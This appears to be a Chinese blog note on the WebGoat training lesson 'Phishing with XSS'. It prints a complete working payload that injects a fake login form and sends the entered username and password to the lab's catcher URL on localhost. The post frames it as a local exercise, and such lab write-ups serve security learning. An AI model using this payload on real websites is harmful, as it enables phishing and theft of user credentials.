WebGoat学习笔记(四)——Phishing with XSS

本文提供了一个具体的XSS(跨站脚本)攻击代码示例,展示了如何通过恶意脚本窃取用户的登录凭据,并发送到攻击者的服务器。文中强调了在实际环境中这种攻击的危害性及其实现方式。

最后能够成功的搜索代码为:

 

<form><br/><br/><HR><H3>This feature requires account login:</H3><br/><br/>Enter Username:<br/><input type="text" id="user" name="user"><br/>Enter Password:<br/><input type="password" name = "pass" id="pass"><br/><input type="submit" name="login" value="login" onclick="var user=document.getElementById('user');var pass=document.getElementById('pass');alert('Had this been a real attack... Your credentials were just stolen. User Name = ' + user.value + 'Password = ' + pass.value);var XSSImage=new Image; XSSImage.src='http://localhost:8080/webgoat/catcher?PROPERTY=yes&user='+ user.value + '&password=' + pass.value + '';"><br/><br/><HR></form>

 

 

注意单引号和多引号的使用,以及跟本地配置相关的正确的提交地址。此为原理性描述,显然不具备实际危害。实际的攻击过程中,采用恶意链接的可能性比较大。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值